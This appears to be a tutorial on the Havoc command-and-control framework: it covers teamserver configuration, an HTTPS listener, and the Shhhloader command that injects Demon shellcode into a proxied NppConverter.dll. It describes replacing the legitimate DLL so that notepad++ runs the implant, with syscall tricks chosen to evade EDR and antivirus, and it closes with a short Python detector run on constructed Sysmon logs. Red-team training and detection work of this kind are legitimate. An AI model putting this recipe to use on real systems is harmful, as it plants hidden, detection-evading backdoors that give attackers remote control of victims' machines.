Practical with Havoc Framework

Teamserver Configuration

Teamserver needs a configuration profile (usually yml) that defines parameters such as the listening IP, port, operator user and password.

Create a configuration profile:

  • In the folder teamserver/data, create the file config.yml and add the configuration below.

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "at19n" {
        Password = "P@ssw0rd"
    }
}

# This block is optional; remove it if you do not use the service endpoint.
Service {
    Endpoint = "service-endpoint"
    Password = "service-password"
}

Demon {
    Sleep = 2
    Jitter = 15

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Start Teamserver

Run the teamserver with the configuration profile:

./havoc server --profile profiles/havoc.yaotl -v

Start Client

The client is the graphical interface used to interact with the teamserver.

From the folder client/build, run the client:

Setup Listener

A listener is the endpoint that receives connections from agents (Demons) running on the target machine.

In the client interface, navigate to Listeners -> Create Listeners.

Example listener configuration (HTTPS):

  • Name: at19n-test

  • Type: HTTPS

  • Host: IP address of the teamserver or redirector

  • Port: 443

  • Callback Interval: Time between callbacks (example: 5s)

Save and start the listener. On success, the listener shows the status "Active".

Hands on

Install Extensions

Extensions list

After clicking Install, the Havoc client automatically clones the Shhhloader source from GitHub.

Description: Shhhavoc is the name of the Shhhloader integration module for Havoc, which allows the use of advanced shellcode injection techniques to evade EDR/AV.

Features:

  • Uses SysWhispers (SysWhispers2, SysWhispers3, GetSyscallStub) to execute indirect syscalls

  • Supports injection methods such as PoolParty, ThreadlessInject, ModuleStomping, QueueUserAPC and ProcessHollow.

  • Options to encode the shellcode and sign the output with a digital certificate to avoid detection.


Create shellcode

Create and deploy a payload with Shhhloader

Use Shhhloader to inject the demon.x64.bin shellcode into the legitimate NppConverter.dll.

Purpose:

  • Create a malicious DLL (NppConverter.dll) containing shellcode that connects back to the Havoc C2.

  • This DLL is loaded by notepad++.exe on startup and executes the shellcode via QueueUserAPC.

  • On the Windows machine, we replace the legitimate NppConverter.dll with the malicious DLL to activate the payload.

/usr/bin/python3 /root/Havoc/data/extensions/Shhhloader/Shhhloader.py /root/share/demon.x64.bin -sc GetSyscallStub -m QueueUserAPC -o /root/share/NppConverter.dll -dp NppConverter.dll -pp explorer.exe -p notepad++.exe

  • /root/share/demon.x64.bin: Path to the Demon shellcode

  • -sc GetSyscallStub: Use the GetSyscallStub syscall method to avoid EDR hooks

  • -m QueueUserAPC: Shellcode injection method using QueueUserAPC

  • -o /root/share/NppConverter.dll: The output file is NppConverter.dll (a malicious DLL)

  • -dp NppConverter.dll: Create a proxy DLL based on the legitimate NppConverter.dll

  • -pp explorer.exe: The parent process is explorer.exe

  • -p notepad++.exe: The target process for shellcode injection is notepad++.exe
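As an added defender-side example (not part of the original write-up): Python detection logic run over constructed Sysmon-style image-load and process-creation records, flagging the host behaviour this technique produces: a Notepad++ plugin DLL whose hash or signature disagrees with a known-good baseline, and notepad++.exe spawning the Demon profile's Spawn64 process notepad.exe. The baseline hash, paths and log field names are constructed assumptions, not values from a real install.

```python
import hashlib

# Constructed baseline: hash of placeholder bytes standing in for the clean
# NppConverter.dll. In practice, take it from a clean Notepad++ install.
GOOD_DLL = b"constructed clean NppConverter.dll bytes"
BASELINE = {"nppconverter.dll": hashlib.sha256(GOOD_DLL).hexdigest()}
PLUGIN_DIR = r"c:\program files\notepad++\plugins\nppconverter"  # assumed path


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def check_image_load(ev: dict) -> list:
    """Sysmon event 7 style record: flag a Notepad++ plugin DLL whose hash,
    signature or path disagrees with the baseline (DLL proxying/sideloading)."""
    name = basename(ev["ImageLoaded"])
    if basename(ev["Image"]) != "notepad++.exe" or name not in BASELINE:
        return []
    reasons = []
    hashes = dict(p.split("=", 1) for p in ev["Hashes"].split(","))
    if hashes.get("SHA256", "").lower() != BASELINE[name]:
        reasons.append("hash mismatch against baseline")
    if ev.get("Signed", "false").lower() != "true":
        reasons.append("unsigned plugin DLL")
    if not ev["ImageLoaded"].lower().startswith(PLUGIN_DIR):
        reasons.append("loaded from unexpected path")
    return reasons


def check_process_create(ev: dict) -> list:
    """Sysmon event 1 style record: notepad++.exe spawning notepad.exe matches
    the Demon profile's Spawn64/Spawn32 sacrificial process used for injection."""
    if basename(ev["ParentImage"]) == "notepad++.exe" and basename(ev["Image"]) == "notepad.exe":
        return ["notepad++.exe spawned the Demon profile's sacrificial process notepad.exe"]
    return []


# Constructed sample telemetry (not real logs): clean load, proxied load, spawn.
EVENTS = [
    {"EventID": 7, "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "ImageLoaded": r"C:\Program Files\Notepad++\plugins\NppConverter\NppConverter.dll",
     "Signed": "true", "Hashes": "SHA256=" + BASELINE["nppconverter.dll"]},
    {"EventID": 7, "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "ImageLoaded": r"C:\Program Files\Notepad++\plugins\NppConverter\NppConverter.dll",
     "Signed": "false", "Hashes": "SHA256=" + hashlib.sha256(b"constructed proxy dll").hexdigest()},
    {"EventID": 1, "ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "Image": r"C:\Windows\System32\notepad.exe"},
]


def triage(events: list) -> list:
    """Return (image, reasons) for every event that trips a check."""
    out = []
    for ev in events:
        hits = check_image_load(ev) if ev["EventID"] == 7 else check_process_create(ev)
        if hits:
            out.append((ev["Image"], hits))
    return out
```

Running `triage(EVENTS)` reports only the proxied DLL load and the sacrificial-process spawn; the clean plugin load passes all three checks.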
